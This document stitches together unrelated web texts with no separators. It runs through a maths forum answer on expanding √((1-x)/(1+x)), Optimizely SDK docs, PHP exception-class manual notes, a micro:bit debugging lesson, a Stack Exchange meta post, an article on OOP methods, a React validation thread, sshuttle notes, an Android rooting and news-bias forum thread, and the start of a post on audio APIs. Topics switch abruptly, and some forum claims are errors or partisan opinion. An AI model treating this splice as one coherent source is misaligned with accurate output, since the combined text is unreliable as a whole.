How do we show that if x is small enough for its cube to be assumed and higher powers to be neglected, √((1-x)/(1+x)) = 1 - x + x²/2?
Discrete Math
\[\large \sqrt{\frac{1-x}{1+x}}=1+x+\frac{x^2}{2}\] right? Not 100% sure what the question is, you may want to rewrite this "if x is small enough for its cube to be assumed and higher powers to be neglected"
You're correct, but please note the small changes to the question. I've edited
• phi
You use a taylor series expansion around x=0 http://en.wikipedia.org/wiki/Taylor_series
Other answers:
Thanks phi. You gave me a nice idea. I applied the Binomial Theorem to expand the expression as far as x^2 and I got the solution.
\[\sqrt{\frac{1-x}{1+x}}\times \sqrt{\frac{1+x}{1+x}}=\frac{\sqrt{1-x^{2}}}{1+x}\]
\[\sqrt{\frac{1-x}{1+x}}\times \sqrt{\frac{1-x}{1-x}}=\frac{1-x}{\sqrt{1-x^{2}}}\]
\[=\left(1-x\right)\left(1-x^{2}\right)^{-\frac{1}{2}}\]
\[=\left(1-x\right)\left(1+\left(-\frac{1}{2}\right)\left(-x^{2}\right)\right)\]
\[=1+\frac{x^{2}}{2}-x+\text{terms containing }x^{3}\text{ and higher powers}=1-x+\frac{x^{2}}{2}\]
\[=1-x+\left(\frac{1}{2}\right)x^{2}\]
OptimizelyJSON
This topic describes how to use the OptimizelyJSON object to work with JSON feature variables in the Optimizely Android SDK.
Since statically typed languages lack native support for JSON, the Android SDK uses the OptimizelyJSON object to retrieve JSON in a flexible way. The Get All Feature Variables and Get Feature Variable JSON methods use OptimizelyJSON to return feature variables. For more information, see GetAllFeatureVariables and GetFeatureVariable.
Version
SDK v3.6 and higher
Methods
You can access JSON representations with the following methods:
Method | Parameters | Description
toString | none | Returns a string representation of the JSON object
toMap | none | Returns a map representation of the JSON object (Map<String,Object>)
getValue | String jsonKey, Class<T> clazz | Returns a specified schema object (T) populated with the value of the JSON key you pass to this method
If the JSON key is null or empty, getValue populates your schema object with all JSON key/value pairs. You can retrieve information for a nested member of the JSON data structure by using flattened JSON dot notation. For example, if you want to access the key nestedField in {field1: {nestedField: "blah"}}, you can call getValue with the parameter "field1.nestedField".
The OptimizelyJSON object is defined as follows:
public class OptimizelyJSON {
public String toString();
public Map<String,Object> toMap();
public <T> T getValue(@Nullable String jsonKey, Class<T> clazz) throws JsonParseException
}
Examples
You can easily use the OptimizelyJSON object, for example to:
• Get a JSON string by calling the toString method, or
• Retrieve a specified schema from the OptimizelyJSON object by calling the getValue method.
The following example shows how to use an OptimizelyJSON object to populate a schema object you declare.
// declare a schema object into which you want to unmarshal OptimizelyJSON content:
public static class SSub {
    public String field;
}
public static class SObj {
    public int field1;
    public double field2;
    public String field3;
    public SSub field4;
}
// parse all JSON key/value pairs into your schema object sObj
SObj sObj = optlyJSON.getValue(null, SObj.class);
// or, parse the specified key/value pair with an integer value
Integer rint = optlyJSON.getValue("field1", Integer.class);
// or, parse the specified nested key/value pair into the SSub schema
SSub rsub = optlyJSON.getValue("field4.field", SSub.class);
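The other accessors work in a similar way. A minimal sketch of using toString and toMap (the optlyJSON variable and the "field1" key are carried over from the example above purely for illustration):
// get the raw JSON string, e.g. for logging
String json = optlyJSON.toString();

// get a Map view of the JSON and read a top-level value from it
Map<String, Object> map = optlyJSON.toMap();
Object field1 = map.get("field1");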
Extending Exceptions
A user-defined exception class can be created by extending the built-in Exception class. The members and properties below show what is accessible within a child class that derives from the built-in Exception class.
Example #1 The built-in Exception class
<?php
class Exception
{
    protected $message = 'Unknown exception';   // exception message
    private   $string;                          // __toString cache
    protected $code = 0;                        // user-defined exception code
    protected $file;                            // source filename of exception
    protected $line;                            // source line of exception
    private   $trace;                           // backtrace
    private   $previous;                        // previous exception (since PHP 5.3)

    public function __construct($message = null, $code = 0, Exception $previous = null);

    final private function __clone();           // Inhibits cloning of exceptions.

    final public function getMessage();         // message of the exception
    final public function getCode();            // code of the exception
    final public function getFile();            // source filename
    final public function getLine();            // source line
    final public function getTrace();           // an array of the backtrace()
    final public function getPrevious();        // previous exception (since PHP 5.3)
    final public function getTraceAsString();   // formatted string of trace

    // Overrideable
    public function __toString();               // formatted string for display
}
?>
If a class extends the built-in Exception class and redefines the constructor, it is highly recommended that it also call parent::__construct() to ensure that all available data has been properly assigned. The __toString() method can be overridden to provide a custom output when the object is presented as a string.
Note:
Exceptions cannot be cloned. Attempting to clone an exception will result in a fatal error (E_ERROR).
Example #2 Extending the Exception class (PHP 5.3.0+)
<?php
/**
 * Define a custom exception class
 */
class MyException extends Exception
{
    // Redefine the exception so the message is not optional
    public function __construct($message, $code = 0, Exception $previous = null) {
        // any custom processing you want to do ...

        // make sure everything is assigned properly
        parent::__construct($message, $code, $previous);
    }

    // custom string representation of the object
    public function __toString() {
        return __CLASS__ . ": [{$this->code}]: {$this->message}\n";
    }

    public function customFunction() {
        echo "A custom function for this type of exception\n";
    }
}

/**
 * Create a class to test the exception
 */
class TestException
{
    public $var;

    const THROW_NONE    = 0;
    const THROW_CUSTOM  = 1;
    const THROW_DEFAULT = 2;

    function __construct($avalue = self::THROW_NONE) {
        switch ($avalue) {
            case self::THROW_CUSTOM:
                // throw a custom exception
                throw new MyException('1 is an invalid parameter', 5);
                break;

            case self::THROW_DEFAULT:
                // throw the default exception.
                throw new Exception('2 is not allowed as a parameter', 6);
                break;

            default:
                // No exception, the object will be created.
                $this->var = $avalue;
                break;
        }
    }
}

// Example 1
try {
    $o = new TestException(TestException::THROW_CUSTOM);
} catch (MyException $e) {      // Should be caught
    echo "Caught my exception\n", $e;
    $e->customFunction();
} catch (Exception $e) {        // Skipped
    echo "Caught default exception\n", $e;
}

// Continue execution
var_dump($o); // Null
echo "\n\n";

// Example 2
try {
    $o = new TestException(TestException::THROW_DEFAULT);
} catch (MyException $e) {      // Doesn't match this type
    echo "Caught my exception\n", $e;
    $e->customFunction();
} catch (Exception $e) {        // Should be caught
    echo "Caught default exception\n", $e;
}

// Continue execution
var_dump($o); // Null
echo "\n\n";

// Example 3
try {
    $o = new TestException(TestException::THROW_CUSTOM);
} catch (Exception $e) {        // Should be caught
    echo "Caught default exception\n", $e;
}

// Continue execution
var_dump($o); // Null
echo "\n\n";

// Example 4
try {
    $o = new TestException();
} catch (Exception $e) {        // Skipped, no exception
    echo "Caught default exception\n", $e;
}

// Continue execution
var_dump($o); // TestException
echo "\n\n";
?>
Note:
Before PHP 5.3.0, exceptions could not be nested. The following code shows an example of extending the Exception class prior to PHP 5.3.0.
<?php
/**
 * Define a custom exception class
 */
class MyException extends Exception
{
    // Redefine the constructor so the message is required
    public function __construct($message, $code = 0) {
        // some code here

        // call the parent constructor
        parent::__construct($message, $code);
    }

    // custom string representation of the object
    public function __toString() {
        return __CLASS__ . ": [{$this->code}]: {$this->message}\n";
    }

    public function customFunction() {
        echo "A custom method for this type of exception\n";
    }
}
?>
User Contributed Notes 8 notes
+10 · iamhiddensomewhere at gmail dot com · 6 years ago
As previously noted exception linking was recently added (and what a god-send it is, it certainly makes layer abstraction (and, by association, exception tracking) easier).
Since <5.3 was lacking this useful feature I took some initiative and created a custom exception class that all of my exceptions inherit from:
<?php
class SystemException extends Exception
{
    private $previous;

    public function __construct($message, $code = 0, Exception $previous = null)
    {
        parent::__construct($message, $code);

        if (!is_null($previous))
        {
            $this->previous = $previous;
        }
    }

    public function getPrevious()
    {
        return $this->previous;
    }
}
?>
Hope you find it useful.
+4 · sapphirepaw.org · 6 years ago
Support for exception linking was added in PHP 5.3.0. The getPrevious() method and the $previous argument to the constructor are not available on any built-in exceptions in older versions of PHP.
+2 · michaelrfairhurst at gmail dot com · 3 years ago
Custom exception classes can allow you to write tests that prove your exceptions
are meaningful. Usually testing exceptions, you either assert the message equals
something in which case you can't change the message format without refactoring,
or not make any assertions at all in which case you can get misleading messages
later down the line. Especially if your $e->getMessage is something complicated
like a var_dump'ed context array.
The solution is to abstract the error information from the Exception class into
properties that can be tested everywhere except the one test for your formatting.
<?php
class TestableException extends Exception {
    private $property;

    function __construct($property) {
        $this->property = $property;
        parent::__construct($this->format($property));
    }

    function format($property) {
        return "I have formatted: " . $property . "!!";
    }

    function getProperty() {
        return $this->property;
    }
}

function testSomethingThrowsTestableException() {
    try {
        throw new TestableException('Property');
    } catch (TestableException $e) {
        $this->assertEquals('Property', $e->getProperty());
    }
}

function testExceptionFormattingOnlyOnce() {
    $e = new TestableException;
    $this->assertEquals('I have formatted: properly for the only required test!!',
        $e->format('properly for the only required test')
    );
}
?>
-1 · Dor · 4 years ago
It's important to note that subclasses of the Exception class will be caught by the default Exception handler
<?php
/**
 * NewException
 * Extends the Exception class so that the $message parameter is now mandatory.
 *
 */
class NewException extends Exception {
    // $message is now not optional, just for the extension.
    public function __construct($message, $code = 0, Exception $previous = null) {
        parent::__construct($message, $code, $previous);
    }
}

/**
 * TestException
 * Tests and throws Exceptions.
 */
class TestException {
    const NONE   = 0;
    const NORMAL = 1;
    const CUSTOM = 2;

    public function __construct($type = self::NONE) {
        switch ($type) {
            case 1:
                throw new Exception('Normal Exception');
                break;
            case 2:
                throw new NewException('Custom Exception');
                break;
            default:
                return 0; // No exception is thrown.
        }
    }
}

try {
    $t = new TestException(TestException::CUSTOM);
}
catch (Exception $e) {
    print_r($e); // Exception Caught
}
?>
Note that if an Exception is caught once, it won't be caught again (even for a more specific handler).
-8 · hollodotme · 2 years ago
Not mentioned in the class structure on top of this site are the following members:
<?php
/**
* @var string
*/
protected $string;
/**
* @var array
*/
protected $trace;
/**
* @var Exception
*/
protected $previous;
?>
... and these methods:
<?php
/**
* @return Exception|null
*/
final public function getPrevious();
?>
-4 · florenxe · 1 year ago
I just wanted to add that "extends" is the same concept as "Inheritance" or "Prototyping" in Javascript. So when you extend a class, you are simply inheriting the class's methods and properties. So you can create custom classes from existing classes, like extending the array class.
-4 · shaman_master at list dot ru · 1 year ago
Use this example for non-numeric codes:
<code>
<?php
class MyException extends Exception
{
/**
* Creates a new exception.
*
* @param string $message Error message
* @param mixed $code The exception code
* @param Exception $previous Previous exception
* @return void
*/
public function __construct($message = '', $code = 0, Exception $previous = null)
{
// Pass the message and integer code to the parent
parent::__construct((string)$message, (int)$code, $previous);
// @link http://bugs.php.net/39615 Save the unmodified code
$this->code = $code;
}
}
</code>
-20 · paragdiwan at gmail dot com · 7 years ago
I have written similar simple custom exception class. Helpful for newbie.
<?php
/*
   This is written for overriding the exceptions.
   custom exception class
*/
error_reporting(E_ALL - E_NOTICE);

class myCustomException extends Exception
{
    public function __construct($message, $code = 0)
    {
        parent::__construct($message, $code);
    }

    public function __toString()
    {
        return "<b style='color:red'>" . $this->message . "</b>";
    }
}

class testException
{
    public function __construct($x)
    {
        $this->x = $x;
    }

    function see()
    {
        if ($this->x == 9)
        {
            throw new myCustomException("i didnt like it");
        }
    }
}

$obj = new testException(9);
try {
    $obj->see();
}
catch (myCustomException $e)
{
    echo $e;
}
?>
Try it, debug it, extend it
Python microbit basics: How to display images
Debug it with code
Find and fix the errors
The code below should be a game of spin the bottle, where an arrow spins around the screen before settling in one direction, but it's got three deliberate errors in it:
A syntax error is a problem with your code that stops it from running. Syntax errors are the easiest type of error to find because, when you try to run your code, you'll get an error message telling you the line number near where Python thinks the problem is.
Clue: Line 3 is a list of all of the images the micro:bit is going to display for spin the bottle. A list can store more than one item of data in order. It uses square brackets to surround all the data, and each individual item should be separated by a comma.
A run-time error doesn't stop your code from running, but it causes your program to crash if it happens whilst your code is running. Run-time errors often happen if you try to access data that doesn't exist (e.g. you're trying to read from a file that doesn't exist, or you're trying to read from a variable that hasn't been set yet).
Clue: In this case, the code is trying to look up the 9th item in a list that only contains 8 items.
A logical error is the hardest type of error to find but often the easiest to fix once you’ve found it. It doesn’t stop your code from running and often it doesn’t even make your code crash. A logical error is when your code does exactly what you’ve told it to do, but you’ve told it to do the wrong thing.
Clue: Logical errors often happen when you try to multiply instead of divide, add instead of subtract, use True instead of False or something similar. In this case, the code should keep looping round forever, spinning the arrow then waiting for the arrow. What the code actually does is never loop round at all. Why?
If you’ve had a go at debugging the code and you’re stuck, watch the video below to give you some further help:
3
The other day, I came across this question: https://softwareengineering.stackexchange.com/questions/337857/name-for-a-list-whose-structure-is-only-defined-by-the-structure-of-the-elements
I saw that the question was on hold for being unclear. However, I felt like I clearly understood the question being asked, so I submitted an edit suggestion to make the question clearer. I was hoping that the edit would be accepted, the question would be reopened, and then I could post an answer.
My suggestion was rejected, and I don't understand why.
One reviewer selected this reason for rejecting the suggestion:
This edit was intended to address the author of the post and makes no sense as an edit. It should have been written as a comment or an answer.
My edit was, in fact, an attempt at improving the question, not an attempt at communicating with the author of the question. I don't understand why the reviewer would have thought I was intending to address the author.
Another reviewer selected this reason:
This edit does not make the post even a little bit easier to read, easier to find, more accurate or more accessible. Changes are either completely superfluous or actively harm readability.
In my opinion, my edit makes the question a lot clearer. Am I wrong about this?
Why was my edit rejected? I'd still like to salvage the original author's question somehow; is there a way I can do that?
5
The close reason of unclear isn't really accurate. This question is primarily opinion based, since it's a name this thing question. The edit does not resolve the reasons for closing the question and make it into a question that would be reopened, so rejecting the edits is appropriate to prevent the question from being bumped back to the homepage.
• I'm not sure I agree. I think that the original question is a "what is the name of this well-known concept?" question, and since the concept does, in fact, have a name, it's not really opinion-based. But I accept the decision that was made. Thank you for your answer! – Tanner Swett Dec 15 '16 at 18:04
Method (computer science)
A method in object-oriented programming (OOP) is a procedure associated with a message and an object. An object consists of data and behavior; these comprise an interface, which specifies how the object may be utilized by any of its various consumers.[1]
Data is represented as properties of the object, and behaviors are represented as methods. For example, a Window object could have methods such as open and close, while its state (whether it is open or closed at any given point in time) would be a property.
In class-based programming, methods are defined within a class, and objects are instances of a given class. One of the most important capabilities that a method provides is method overriding - the same name (e.g., area) can be used for multiple different kinds of classes. This allows the sending objects to invoke behaviors and to delegate the implementation of those behaviors to the receiving object. A method in Java programming sets the behavior of a class object. For example, an object can send an area message to another object and the appropriate formula is invoked whether the receiving object is a rectangle, circle, triangle, etc.
Methods also provide the interface that other classes use to access and modify the properties of an object; this is known as encapsulation. Encapsulation and overriding are the two primary distinguishing features between methods and procedure calls.[2]
Overriding and overloading
Method overriding and overloading are two of the most significant ways that a method differs from a conventional procedure or function call. Overriding refers to a subclass redefining the implementation of a method of its superclass. For example, findArea may be a method defined on a shape class;[3] subclasses such as rectangle, triangle, etc. would each define the appropriate formula to calculate their area. The idea is to look at objects as "black boxes" so that changes to the internals of the object can be made with minimal impact on the other objects that use it. This is known as encapsulation and is meant to make code easier to maintain and re-use.
Method overloading, on the other hand, refers to differentiating the code used to handle a message based on the parameters of the method. If one views the receiving object as the first parameter in any method then overriding is just a special case of overloading where the selection is based only on the first argument. The following simple Java example illustrates the difference:
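A minimal sketch of what such an example might look like (all class and method names here are illustrative, not taken from any particular codebase):
// Overriding: a subclass redefines a method of its superclass.
class Shape {
    double area() { return 0.0; }
}

class Circle extends Shape {
    double radius = 1.0;

    @Override
    double area() { return Math.PI * radius * radius; } // overrides Shape.area()
}

// Overloading: the same name with different parameter lists,
// selected at compile time based on the arguments.
class Printer {
    void print(int value)    { System.out.println("int: " + value); }
    void print(String value) { System.out.println("String: " + value); }
}

public class Demo {
    public static void main(String[] args) {
        Shape s = new Circle();
        System.out.println(s.area()); // dynamic dispatch picks Circle.area()

        Printer p = new Printer();
        p.print(42);   // compile-time choice of print(int)
        p.print("42"); // compile-time choice of print(String)
    }
}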
Accessor, mutator and manager methods
Accessor methods are used to read the data values of an object. Mutator methods are used to modify the data of an object. Manager methods are used to initialize and destroy objects of a class, e.g. constructors and destructors.
These methods provide an abstraction layer that facilitates encapsulation and modularity. For example, if a bank-account class provides a getBalance accessor method to retrieve the current balance (rather than directly accessing the balance data fields), then later revisions of the same code can implement a more complex mechanism for balance retrieval (e.g., a database fetch), without the dependent code needing to be changed. The concepts of encapsulation and modularity are not unique to object-oriented programming. Indeed, in many ways the object-oriented approach is simply the logical extension of previous paradigms such as abstract data types and structured programming.[4]
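As a rough Java sketch of the bank-account example just described (the exact class shape is an assumption made for illustration):
class BankAccount {
    private double balance; // encapsulated state

    // accessor: reads a data value of the object
    public double getBalance() {
        return balance; // a later revision could fetch this from a database instead
    }

    // mutator: modifies the data of the object
    public void deposit(double amount) {
        balance += amount;
    }
}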
Constructors
A constructor is a method that is called at the beginning of an object's lifetime to create and initialize the object, a process called construction (or instantiation). Initialization may include an acquisition of resources. Constructors may have parameters but usually do not return values in most languages. See the following example in Java:
public class Main {
String _name;
int _roll;
Main(String name, int roll) { // constructor method
this._name = name;
this._roll = roll;
}
}
Destructors
A destructor is a method that is called automatically at the end of an object's lifetime, a process called destruction. Destruction in most languages does not allow destructor method arguments nor return values. Destruction can be implemented so as to perform cleanup chores and other tasks at object destruction.
Finalizers
In garbage-collected languages, such as Java, C#, and Python, destructors are known as finalizers. They have a similar purpose and function to destructors, but because of the differences between languages that utilize garbage-collection and languages with manual memory management, the sequence in which they are called is different.
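In Java, for instance, a finalizer can be written by overriding Object.finalize, although finalize has been deprecated in recent Java releases in favor of java.lang.ref.Cleaner. A minimal sketch, with an illustrative temporary-file cleanup chore:
class TempFileHolder {
    private final java.io.File file = new java.io.File("holder.tmp");

    // finalizer: invoked by the garbage collector at some unspecified time, if at all
    @Override
    protected void finalize() throws Throwable {
        try {
            file.delete(); // cleanup chore, analogous to a destructor
        } finally {
            super.finalize();
        }
    }
}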
Abstract methods
An abstract method is one with only a signature and no implementation body. It is often used to specify that a subclass must provide an implementation of the method. Abstract methods are used to specify interfaces in some programming languages.[5]
Example
The following Java code shows an abstract class that needs to be extended:
abstract class Shape {
abstract int area(int h, int w); // abstract method signature
}
The following subclass extends the main class:
public class Rectangle extends Shape {
@Override
int area(int h, int w) {
return h * w;
}
}
Reabstraction
If a subclass provides an implementation for an abstract method, another subclass can make it abstract again. This is called reabstraction.
In practice, this is rarely used.
Example
In C#, a virtual method can be overridden with an abstract method. (This also applies to Java, where all non-private methods are virtual.)
class IA
{
    public virtual void M() { }
}

abstract class IB : IA
{
    public abstract override void M(); // allowed
}
Interfaces' default methods can also be reabstracted, requiring subclasses to implement them. (This also applies to Java.)
interface IA
{
    void M() { }
}

interface IB : IA
{
    abstract void IA.M();
}

class C : IB { } // error: class 'C' does not implement 'IA.M'.
Class methods
Class methods are methods that are called on a class rather than an instance. They are typically used as part of an object meta-model, i.e., for each class defined, an instance of the class object is created in the meta-model. Meta-model protocols allow classes to be created and deleted. In this sense, they provide the same functionality as the constructors and destructors described above. But in some languages, such as the Common Lisp Object System (CLOS), the meta-model allows the developer to dynamically alter the object model at run time: e.g., to create new classes, redefine the class hierarchy, modify properties, etc.
Special methods
Special methods are very language-specific and a language may support none, some, or all of the special methods defined here. A language's compiler may automatically generate default special methods or a programmer may be allowed to optionally define special methods. Most special methods cannot be directly called, but rather the compiler generates code to call them at appropriate times.
Static methods
Static methods are meant to be relevant to all the instances of a class rather than to any specific instance. They are similar to static variables in that sense. An example would be a static method to sum the values of all the variables of every instance of a class. For example, if there were a Product class it might have a static method to compute the average price of all products.
In Java, a commonly used static method is:
Math.max(double a, double b)
This static method has no owning object and does not run on an instance. It receives all information from its arguments.[3]
A static method can be invoked even if no instances of the class exist yet. Static methods are called "static" because they are resolved at compile time based on the class they are called on and not dynamically as in the case with instance methods, which are resolved polymorphically based on the runtime type of the object.
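A sketch of the product-averaging idea mentioned above (the Product class and its fields are assumptions made purely for illustration):
class Product {
    private static double totalPrice = 0;
    private static int count = 0;
    private final double price;

    Product(double price) {
        this.price = price;
        totalPrice += price; // class-wide state shared by all instances
        count++;
    }

    // static method: relevant to all instances rather than any specific one
    static double averagePrice() {
        return count == 0 ? 0 : totalPrice / count;
    }
}
Product.averagePrice() can be called even before any instance exists; in this sketch it simply returns 0 in that case.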
Copy-assignment operators
Copy-assignment operators define actions to be performed by the compiler when a class object is assigned to a class object of the same type.
Operator methods
Operator methods define or redefine operator symbols and define the operations to be performed with the symbol and the associated method parameters. C++ example:
#include <string>
class Data {
public:
bool operator<(const Data& data) const { return roll_ < data.roll_; }
bool operator==(const Data& data) const {
return name_ == data.name_ && roll_ == data.roll_;
}
private:
std::string name_;
int roll_;
};
Member functions in C++
Some procedural languages were extended with object-oriented capabilities to leverage the large skill sets and legacy code for those languages but still provide the benefits of object-oriented development. Perhaps the most well-known example is C++, an object-oriented extension of the C programming language. Due to the design requirements to add the object-oriented paradigm on to an existing procedural language, message passing in C++ has some unique capabilities and terminologies. For example, in C++ a method is known as a member function. C++ also has the concept of virtual functions which are member functions that can be overridden in derived classes and allow for dynamic dispatch.
Virtual functions
Virtual functions are the means by which a C++ class can achieve polymorphic behavior. Non-virtual member functions, or regular methods, are those that do not participate in polymorphism.
C++ Example:
#include <iostream>
#include <memory>
class Super {
 public:
  virtual ~Super() = default;
  virtual void IAm() { std::cout << "I'm the super class!\n"; }
};
class Sub : public Super {
 public:
  void IAm() override { std::cout << "I'm the subclass!\n"; }
};
int main() {
  std::unique_ptr<Super> inst1 = std::make_unique<Super>();
  std::unique_ptr<Super> inst2 = std::make_unique<Sub>();
  inst1->IAm(); // Calls |Super::IAm|.
  inst2->IAm(); // Calls |Sub::IAm|.
}
See also
Notes
1. ^ Consumers of an object may consist of various kinds of elements, such as other programs, remote computer systems, or computer programmers who wish to utilize the object as part of their own programs.
2. ^ "What is an Object?". oracle.com. Oracle Corporation. Retrieved 2013.
3. ^ a b Martin, Robert C. (2009). Clean Code: A Handbook of Agile Software Craftsmanship. Prentice Hall. p. 296. ISBN 978-0-13-235088-4.
4. ^ Meyer, Bertrand (1988). Object-Oriented Software Construction. Cambridge: Prentice Hall International Series in Computer Science. pp. 52-54. ISBN 0-13-629049-3.
5. ^ "Abstract Methods and Classes". oracle.com. Oracle Java Documentation. Retrieved 2014.
References
This article uses material from the Wikipedia page available here. It is released under the Creative Commons Attribution-Share-Alike License 3.0.
Presentation vs Container best practices for client-side validation
(Mark Winterbottom) #1
Hey guys,
I’m new here and this is my first post on the forums. I’ve been learning React for a while and I have a question about the best practice for something.
I am building a React app and trying to follow the pattern of separating presentational and container components as described here.
I’m confused as to where client-side validation would sit in this pattern?
For example, if I have the following components:
Presentational
• InputField (rendering an <input>)
• LoginForm (rendering a <form> with InputFields for username and password)
Container
• LoginPage (renders the LoginForm and handles making the API request)
My question is, where would client-side form validation fit into this? Would it go into the <LoginPage> or should it go in the <LoginForm>?
Appreciate any advice anyone can offer!
Cheers,
Mark
(Jason Sooter) #2
This article will give you some insight:
Validation will generally be in the Container.
Libraries like Formik, React-Final-Form, and Redux-Form also help with this. Even if just looking at them for the types of scenarios you need to handle.
(Mickey Puri) #3
Hi Mark
I would recommend putting client side validation in the LoginForm. The form is able to work out if it is valid or not and so this task does not need to be delegated to a parent component.
Mickey
(Joshua Ihejiamaizu) #4
Think of presentation components as strictly concerned with receiving and rendering props. This makes them easier to test and maintain as well as scale for different use cases.
I pretty much support @JasonSooter’s answer. You can also create a Higher Order Component that takes care of validation and prop passing, so your input components are simply always wrapped in the HoC and remain presentational themselves.
(Mark Winterbottom) #5
Hey all, really appreciate you taking the time to respond, your suggestions are really helpful.
I have kept the validation out of the presentation components and put it in the container as suggested by @JasonSooter and @joshuaai. So far it seems a lot cleaner and easier to unit test.
Cheers,
Mark
sshuttle
On-the-fly VPN over :ssh
web | docs | code | LGPL2.1+?
See also | :openvpn :ssh
Notes
Single connection
To create a single virtual connection, specify an IP address without a subnet mask or with a mask of /32. These are equivalent:
sshuttle -r user@host:port ip
sshuttle -r user@host:port ip/32
Reference: https://sshuttle.readthedocs.io/en/stable/manpage.html#cmdoption-sshuttle-arg-subnets
Backlinks: openvpn
CC0 / Public domain dedication To the extent possible under law, d3vid seaward has waived all copyright and related or neighboring rights to "sshuttle in Grasmere notebook, including code snippets" (why? how?)
Interesting CNN article on Android's Open Operating System
1. khsjsilver
khsjsilver Well-Known Member This Topic's Starter
2. ekyle
ekyle Well-Known Member
true :( as long as we have root, it's all good though :)
3. Frisco
Frisco =Luceat Lux Vestra= VIP Member
4. bigbadwulff
bigbadwulff Well-Known Member
CNN?
Surely Apple fanboys.
Haven't watched CNN in about 10 years.
5. ekyle
ekyle Well-Known Member
I get good news on Twitter before it hits CNN lol
6. dmevis
dmevis Member
Android is well on its way to being as "closed" as the iPhone. It is not being closed by Google, it is being closed by the Carriers and Manufacturers. Both the Carriers and Manufacturers are working hard to ensure that you can not change the phone from the way they dictate that you use it. They will continue to make it harder and harder to gain Root. Without Root, the Android is just as closed as the iPhone.
7. gr33nd3vil
gr33nd3vil Active Member
I feel this statement is false. No one, I mean no one, can make something unrootable or untweakable. It's not realistic. There is always and will always be someone or some group that finds a way to work around it.
the iPhone is semi crippled, depending how you look at it, as there is ways to jail break it, and such.
Just like the Droid can be rooted.
And the blackberry has it's Hyrbid OS's.
Most people choose rooted for better performance and battery life.
8. superdesi
superdesi Well-Known Member
I kno I shud b using the forum search for this buuuuuut.....does rooting break your ToS with verizon?
9. jreed2560
jreed2560 Well-Known Member
It voids your warranty if they check it, which they very rarely do
10. sund0wn
sund0wn Well-Known Member
correct me if i'm wrong, but "open source" doesnt mean every android device has r/w system folders, unlocked bootloaders, etc. i think people confuse the term.
open source means the source code is readily available for anyone to make their own device. cell phones are a new frontier for open source OS. it isnt fair to compare phones to computers. the manufacturers are simply trying to protect themselves. sure, maybe they are making mistakes, but this whole thing is rather new, and they are simply trying to protect their bottom line.
android source code is readily available, and anyone can make applications, and we can get apps from anywhere. that is what open source is all about.
do i want devices with unlocked bootloaders and superuser access? of course. but, the fact that a manufacturer can make a device with android and lock it down, and set it up however they want, is exactly what open source is all about.
if you all want devices that arent locked down, and come pre-rooted, then you should also be prepared to pay $500+, and not expect the carriers to support them nearly as much. if you brick the device, too bad. i would actually support this, but it's not good for the average phone user. i may not be completely happy with the way things are, but i can't say i dont understant it.
11. sund0wn
sund0wn Well-Known Member
this isnt true at all. on the iphone, the only place you can get apps is the app store (unless you jailbreak, in which case, you then only get app store and cydia). and, it is really hard to get an app into the app store. anyone can put an app in the market. also, look how many manufacturers have android phones. how many manufacturers have iOS? that is the difference between open and closed source. it has nothing to do with bootloaders or superuser access.
12. jreed2560
jreed2560 Well-Known Member
I totally agree with you sundOwn. Google's job isn't making phones. Google provides the OS, which is as open as open can be. They release the source code for any and everybody to see and use. they allow the developers free reign to use it as they please to make applications. The market is completely open. Only when something is deemed totally inappropriate or harmful will it be taken down. Google holds their end of open source up. They can't be held responsible to the fact that once mfgs. get the OS they lock it down.
basically:
Google/Android = OPEN
MFG./Carriers = Nazi
lol
13. sund0wn
sund0wn Well-Known Member
and to add to that, it's our job as the consumer to have a loud enough voice to let them know what we want. we're never going to see every phone come to market unlocked and rooted.
but, if we can find a way to make our voice heard, maybe we'll see some nice pieces of hardware, that we can do with what we please. i, for one, will not be buying another phone with eFuse.
just as enough people screamed loudly about IE being locked on to windows. now it's removable. we need to do the same with encrypted bootloaders and bloat. i'm not holding my breath, but we still need to band together and try. i know we are a small community, but we're growing every day, and that's all the more reason to band together.
14. nj02vette
nj02vette Well-Known Member
CNN has apple shoved so far up it's rectum that it can taste the seeds.
Are they even a viable news source anymore?
15. Jim Dawson
Jim Dawson Well-Known Member
No, and they haven't been for years.
16. cbaty08
cbaty08 Well-Known Member
I can agree that every news outlet has an objective... but I do think that CNN is one of the more reputable broadcasts that are up to date with everything.
I am going to miss Rick Sanchez now though... oh well.
FWIW I hold quite a few of the reporters with mucho respect. Sanjay Gupta, Anderson Cooper, and a many many others are great reporters and good people.
17. aohus
aohus Well-Known Member
the true source of the article is BusinessInsider.com they are a known apple enthusiast website. in essence, the bloggers are bought and paid for.
just look at their website and its all pro apple blog posts.
its the same thing as a foxnews article bashing the obama administration.
18. Sketchr
Sketchr VIP Member VIP Member
which is similar to msnbc getting wood over the obama admin :D
19. eraursls1984
eraursls1984 Well-Known Member
But thats ok because it's the same as their views. Fox news, although I don't like them or the others I'm going to name, uses exaggeration and lies much less than msnbc, cbs, nbc and cnn but a lot of people don't question them because it's what they want to hear.
Beep, beep, I'm a sheep
Audio I/O is a complex topic, which scares away many inspired musicians who are into programming (or programmers who are into music). Let’s try making it look less complex and see how audio works on each modern desktop platform.
Our showcase today will be a simple beeper. Remember that annoying thing inside your PC box producing the irritating buzzing sound? It's long gone, but I suggest we summon its soul and make a library that plays beeps across all the platforms.
The end result is available here - https://github.com/zserge/beep.
Windows
We are lucky here - Windows already has a Beep(frequency, duration) function in <utilapiset.h>, so we can reuse that.
The function has had a very long and hard life. It was introduced to play beeps through the hardware beeper using the 8253 programmable interval timer. As more and more PCs came without a beeper, this function became obsolete, but in Windows 7 it was rewritten to play beeps using the regular sound card API.
Yet, behind the simplicity of this function hides the complexity of all the Windows sound APIs. There has been MME released in 1991, which is the default choice for audio because it’s well supported. However, MME is known to have very high playback latency and probably won’t be suitable for most audio apps. There is also WASAPI released in 2007, which has much lower latency, especially when used in exclusive mode (i.e. when you app runs - the user can’t listen to Spotify or any other app, your app owns the sound hardware exclusively). WASAPI is often a good choice for audio apps, but there is also DirectSound, which basically wraps WASAPI for DirectX interfacing.
If in doubt - use WASAPI.
Linux
Audio is one of a few areas, where Linux APIs are no better than the rest of the platforms. First of all, there is ALSA, which is part of the kernel itself. ALSA works directly with the hardware and if you would like your app to work exclusively with sound - ALSA could probably be a good compromise between complexity and performance. If you are bulding a synth or a sampler for a Raspberry Pi - ALSA could be a good choice.
Then, there is PulseAudio, which is a modern desktop abstraction layer built on top of ALSA. It routes sound from various apps and tries to mix the audio streams so that the critial apps would not suffer from latency issues. Although PulseAudio brings many features that would not be possible with ALSA, like routing sound via internet, most musician apps don’t use it.
